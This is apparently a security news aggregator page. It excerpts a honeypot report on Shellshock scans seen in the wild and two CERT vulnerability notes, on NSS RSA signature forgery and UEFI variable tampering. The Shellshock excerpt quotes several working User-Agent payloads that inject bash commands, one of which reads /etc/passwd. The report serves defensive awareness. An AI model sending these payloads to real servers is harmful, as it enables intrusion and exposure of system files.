Tagged: intel

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th) 0

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far: 1 – Simple “vulnerability checks” that used custom User-Agents: () { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a; () { :;}; echo ‘Shellshock: Vulnerable’ () { :;};echo content-type:text/plain;echo;echo [random string];echo;exit () { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi This one is a bit different. It includes the tested URL as user agent

VU#772676: Mozilla Network Security Services (NSS) fails to properly verify RSA signatures 0

VU#772676: Mozilla Network Security Services (NSS) fails to properly verify RSA signatures

Vulnerability Note VU#772676 Mozilla Network Security Services (NSS) fails to properly verify RSA signatures Original Release date: 24 Sep 2014 | Last revised: 24 Sep 2014 Overview The Mozilla Network Security Services (NSS) library fails to properly verify RSA signatures due to incorrect ASN.1 parsing of DigestInfo. This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate. Description CWE-295 : Improper Certificate Validation RSA signatures are used to authenticate the source of a message.

VU#758382: Unauthorized modification of UEFI variables in UEFI systems 0

VU#758382: Unauthorized modification of UEFI variables in UEFI systems

Vulnerability Note VU#758382 Unauthorized modification of UEFI variables in UEFI systems Original Release date: 09 Jun 2014 | Last revised: 09 Jun 2014 Overview Certain firmware implementations may not correctly protect and validate information contained in certain UEFI variables. Exploitation of such vulnerabilities could potentially lead to bypass of security features and/or denial of service for the platform. Description According to Corey Kallenberg, Xeno Kovah, John Butterworth, and Sam Cornwell of the MITRE Corporation, certain UEFI systems contain a vulnerability which could allow unauthorized modification of UEFI variables: As discussed in recent conference publications ( CanSecWest 2014 , Syscan 2014, and Hack-in-the-Box 2014 ) certain UEFI implementations do not correctly protect and validate information contained in the ‘Setup’ UEFI variable